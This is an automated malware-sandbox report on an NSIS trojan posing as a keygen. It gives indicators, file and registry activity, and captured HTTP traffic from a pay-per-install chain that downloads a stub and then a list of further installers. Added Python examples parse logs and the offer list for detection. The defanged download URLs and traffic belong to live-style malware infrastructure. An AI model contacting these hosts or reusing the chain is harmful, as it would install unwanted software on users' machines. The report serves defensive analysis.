Trojan.NSIS.StartPage_cd53afa778
Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: cd53afa778170a6182c250b7b4b36f6f
SHA1: bdeb84131f29dd695f50108a79a1a21891576e4c
SHA256: ca0714dcf3554a034db01e8494d48c6c7cec0b6ff5abf7dd81ab872a6d0817c4
SSDeep: 3072:SgXdZt9P6D3XJJbCRx7pq01GLeIqhPkI8R e79tJ0LXs6prmvvlz9pGrfiU:Se34WRxd1GDG6 e7WzpyGrqU
Size: 166054 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
Three processes were observed. The report template lists them as code-injection targets, but nothing in the file or registry activity below evidences injection; what the file activity shows is a plain drop-and-execute chain: the original NSIS installer (PID 468) downloads the stub served by stub_maker.php (cached as Content.IE5\4DQJW9YN\56d85d444db76[1].exe) and writes it to nsj2.tmp\whIkaR9Rme.exe; that stub (PID 564) extracts nst4.tmp\cpSetup.exe; cpSetup.exe (PID 380), the setupName=cpSetup download named in the first launch_v5.php offer, runs last. The InstallCapital-agent requests to up.afiledownload27.space carry the same affId=1006 and instId=11 values as that offer URL.
%original file name%.exe:468
whIkaR9Rme.exe:564
cpSetup.exe:380
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
File activity
The process whIkaR9Rme.exe:564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\cpSetup.exe (14751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\182741632 (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\29ufGoaPqW (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\inetc.dll (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (0 bytes)
The process cpSetup.exe:380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00081064.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0008169e.a (1730 bytes)
Registry activity
The process whIkaR9Rme.exe:564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C6 C7 FA 42 7F 25 1B B1 2B 2C AB 4E A2 F4 47"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA 55 86 E5 69 3D CF 31 44 C6 63 97 EE 86 C1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets IE security zone mapping so that all network paths (UNCs) are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets IE security zone mapping so that all sites that bypass the proxy server are treated as Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets IE security zone mapping so that all local sites not listed in other zones (plain host names without dots) are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Note: all three ZoneMap values at 1 are Internet Explorer's stock Local Intranet configuration. These writes, like the Cache\Paths, Shell Folders, MountPoints2 and RNG Seed values above, are routine side effects of the WinINet, shell and CryptoAPI libraries the installer loads; on their own they are weak evidence of deliberate tampering.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process cpSetup.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 4F 85 87 B6 B1 F2 F1 D6 B2 E0 43 08 82 EF 63"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1456940889"
"Name" = "cpSetup.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
The Trojan sets IE security zone mapping so that all sites that bypass the proxy server are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan sets IE security zone mapping so that all network paths (UNCs) are treated as Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan sets IE security zone mapping so that all local sites not listed in other zones (plain host names without dots) are treated as Intranet Zone:
"IntranetName" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| fcda6337ded197931e73b38fad6eff3b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00081064.a |
| 9432c3fcde74ce7814639b05d1a490f4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0008169e.a |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\inetc.dll |
| 1f9d4b5504148474f9e06590255a616e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\NSISdl.dll |
| 37d9d77f9918a7cd0210300bc4e433b0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\nsArray.dll |
| 1f9d4b5504148474f9e06590255a616e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 6056 | 6144 | 2.89511 | d79d7ed90c8536f556f40e7d03160974 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up.afiledownload27.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 | |
| hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854 | |
| hxxp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= | |
| hxxp://get.inmyglasse3.xyz/launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe | |
| hxxp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible Call with No Offset TCP Shellcode
Note: the SHELLCODE alert is a byte-pattern rule that routinely fires on ordinary x86 executables in transit (here the PE stub returned by stub_maker.php), so treat it as low-confidence corroboration. The NSIS_Inetc, NSISDL/1.2 and InstallCapital user agents in the traffic below, together with the affId/instId/ho_trackingid tracking parameters, are the more specific indicators.
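As an added example (not part of this report and not code from the installer): the detection logic below runs over constructed proxy-log lines and flags the signals this capture exposes, namely the two NSIS download-plugin user agents, the bundler's InstallCapital agent, the affiliate-tracking query parameters on its endpoints, and the base64-encoded n= parameter carrying the advertised program name (S2V5Z2Vu decodes to Keygen, matching name=Keygen elsewhere in the capture). The log layout (timestamp, client, method, URL, quoted user agent) is an assumed format; the URLs in the sample lines are taken from the Traffic section, while client addresses and the benign line are made up.

```python
"""Triage HTTP proxy-log lines for the pay-per-install download chain in this report.

Added example, not code from the report or the installer. Assumed log layout:
<timestamp> <client> <method> <url> "<user-agent>"
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# user-agent substrings observed in the capture, with the reason to report
UA_SIGNALS = {
    "NSIS_Inetc": "NSIS inetc plugin download (ET POLICY rule)",
    "NSISDL/": "NSIS NSISdl plugin download",
    "InstallCapital": "InstallCapital bundler check-in",
}
# endpoints and tracking parameters the bundler used in the capture
PPI_ENDPOINTS = ("/launch_reb.php", "/launch_v5.php", "/stub_maker.php",
                 "/offer.php", "/installer.php")
PPI_PARAMS = {"affId", "instId", "trackingId", "ho_trackingid", "b_typ"}

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def decode_name(value):
    """Decode the base64 n= parameter (advertised program name); None if not base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify(line):
    """Return a finding dict for a suspicious line, or None when nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    for needle, why in UA_SIGNALS.items():
        if needle in m["ua"]:
            reasons.append("user-agent: " + why)
    parts = urlsplit(m["url"])
    query = parse_qs(parts.query)
    advertised = None
    if parts.path.endswith(PPI_ENDPOINTS):
        hits = sorted(PPI_PARAMS & set(query))
        if hits:
            reasons.append("tracking params: " + ",".join(hits))
        if m["method"] == "POST" and parts.path.endswith("/installer.php"):
            reasons.append("offer selection POST to installer.php")
        if "n" in query:
            advertised = decode_name(query["n"][0])
    if not reasons:
        return None
    return {"ts": m["ts"], "src": m["src"], "host": parts.hostname,
            "advertised_name": advertised, "reasons": reasons}


def triage(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample lines; URLs come from the report's Traffic section.
SAMPLE_LOG = [
    '2016-03-03T15:50:45Z 10.0.0.5 GET http://get.inmyglasse3.xyz/launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe "NSIS_Inetc (Mozilla)"',
    '2016-03-03T15:50:47Z 10.0.0.5 GET http://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= "NSISDL/1.2 (Mozilla)"',
    '2016-03-03T15:50:41Z 10.0.0.5 GET http://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA "InstallCapital"',
    '2016-03-03T15:50:53Z 10.0.0.5 POST http://up.afiledownload27.space/installer.php?affId=1006&instId=11&cid=707569c4c57c87d53171d83f71777ffd "InstallCapital"',
    '2016-03-03T15:51:00Z 10.0.0.7 GET http://www.example.com/index.html "Mozilla/5.0 (Windows NT 5.1)"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ts"], f["src"], f["host"], f["advertised_name"], "; ".join(f["reasons"]))
```

The user-agent match alone is the noisy part (legitimate NSIS installers also use inetc and NSISdl), which is why the ET rule is classed POLICY; the combination with the tracking parameters and the decoded advertised name is what makes a line worth an analyst's time.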
Traffic
GET /launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.inmyglasse3.xyz
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 116
Connection: keep-alive
Date: Thu, 03 Mar 2016 15:50:45 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pyjZcJjVFyMA7OFX6QbGbHJrLUsIPY1kZRFvSbx_Y-abW3ab91Xgng==
s=first
u=hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
GET hXXp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 76840
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 8a4d4882753d62d900bb1b7541308eca.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bE2RH4xizxx-6jCHjhyIqeBErhBc_7x6oQCd8Gk0tIih_nflw2U-Lw==
[76840-byte body: opaque binary data, not HTML despite the text/html Content-Type; raw dump omitted] <<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= HTTP/1.0
Host: up.sdfuus98d7f.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1653
Connection: close
Date: Thu, 03 Mar 2016 15:50:47 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ZgZvtN44l2TvzBy5kyO3WET__417C7TrgS-kzrbUHt0OHFhvJ__mbA==
files=4
t1=dl
u1=hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
t2=dl
u2=hXXp://get.file888desktop.info/?p=24718&d=30497&l=29729&dynamicname=Keygen&filename=setup-1228&exeurl=http://d16oc15frjt76r.cloudfront.net/setup_ru.exe>=get75&ts=14533669397&con=1&prl=1&d1=5586943&d2=1227
n2=setup-1228.exe
b2=ru
c2=sevenzip-2
s2=0
m2=1
d2=1500
t3=dl
u3=hXXp://VVV.autojuly16-hp-download.biz/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
n3=Setup__2140_il189.exe
b3=am
c3=2140-sevenzip
s3=0
m3=0
d3=0
t4=dl
u4=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Keygen&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net%2Fpe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
n4=SevenZip-apset.exe
b4=ap
c4=sevenzip
s4=0
m4=0
d4=0
t5=dl
u5=http://sub.spirlymo.com/installers/cli/1457017331461/SevenZip_downloader-Q0i7uvJmR.exe
n5=SevenZip_downloader-Q0i7uvJmR.exe
b5=bi
c5=sevenzip-<<< skipped >>>
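As an added example (not part of this report and not code from the installer): a parser for the launch_v5.php offer list above. The response is a newline-separated key=value list in which each key is a one-letter field name followed by the offer index; only u (download URL) and n (file name the stub writes to disk) are unambiguous from the capture, and the labels given to t, b, c, s, m and d below are assumptions. The sample body is constructed from the captured response, with real line breaks where the dump shows dots, and covers three of the five offers. The parser groups entries by index rather than trusting the files= field (the capture declares files=4 but carries at least five entries), undoes the report's hXXp/VVV defanging so the URL can be split, and pulls out second-stage URLs hidden in query parameters such as exeurl=, appsetupurl= and producturl=, since those hosts never appear as top-level offer URLs.

```python
"""Parse the offer list returned by the bundler's launch_v5.php endpoint.

Added example for this report; not code from the report or from the installer.
Only u (download URL) and n (file name) are unambiguous in the capture; the
other field letters are carried through by position and their labels are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# one-letter field name + offer index, e.g. "u2=http://..."
FIELD_RE = re.compile(r"^([a-z])(\d+)=(.*)$")
# http(s) URLs smuggled inside query parameters (exeurl=, appsetupurl=, producturl=)
NESTED_URL_RE = re.compile(r"https?://[^&\s<>]+")


def refang(url):
    """Undo the report's defanging (hXXp -> http, VVV. -> www.) so urlsplit works."""
    url = re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)
    return url.replace("://VVV.", "://www.")


def parse_launch_v5(body):
    """Return {"declared": files= value (or None), "offers": [one dict per index]}.

    Offers are grouped by the numeric index after the field letter, not by the
    files= count: the captured response says files=4 but carries five entries.
    """
    declared = None
    fields = defaultdict(dict)  # index -> {letter: value}
    for raw in body.splitlines():
        line = raw.strip()
        if line.startswith("files="):
            try:
                declared = int(line.split("=", 1)[1])
            except ValueError:
                declared = None
            continue
        m = FIELD_RE.match(line)
        if m:
            letter, idx, value = m.groups()
            fields[int(idx)][letter] = value

    offers = []
    for idx in sorted(fields):
        f = fields[idx]
        url = refang(f.get("u", ""))
        parts = urlsplit(url)
        offers.append({
            "index": idx,
            "type": f.get("t"),        # "dl" in every captured entry (assumed: download)
            "url": url,
            "host": parts.hostname,
            "filename": f.get("n"),    # name the stub writes to disk
            "campaign": f.get("c"),    # assumed: campaign/offer tag
            "nested_urls": NESTED_URL_RE.findall(parts.query),
        })
    return {"declared": declared, "offers": offers}


def collect_hosts(parsed):
    """Every host an endpoint would contact if all offers ran (blocklist input)."""
    hosts = set()
    for offer in parsed["offers"]:
        for u in [offer["url"], *offer["nested_urls"]]:
            h = urlsplit(u).hostname
            if h:
                hosts.add(h)
    return sorted(hosts)


# Constructed sample: three of the five offers from the captured response,
# with real line breaks where the report's dump shows dots.
SAMPLE_BODY = """files=4
t1=dl
u1=hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
m1=0
d1=0
t2=dl
u2=hXXp://get.file888desktop.info/?p=24718&d=30497&l=29729&dynamicname=Keygen&filename=setup-1228&exeurl=http://d16oc15frjt76r.cloudfront.net/setup_ru.exe>=get75&ts=14533669397&con=1&prl=1&d1=5586943&d2=1227
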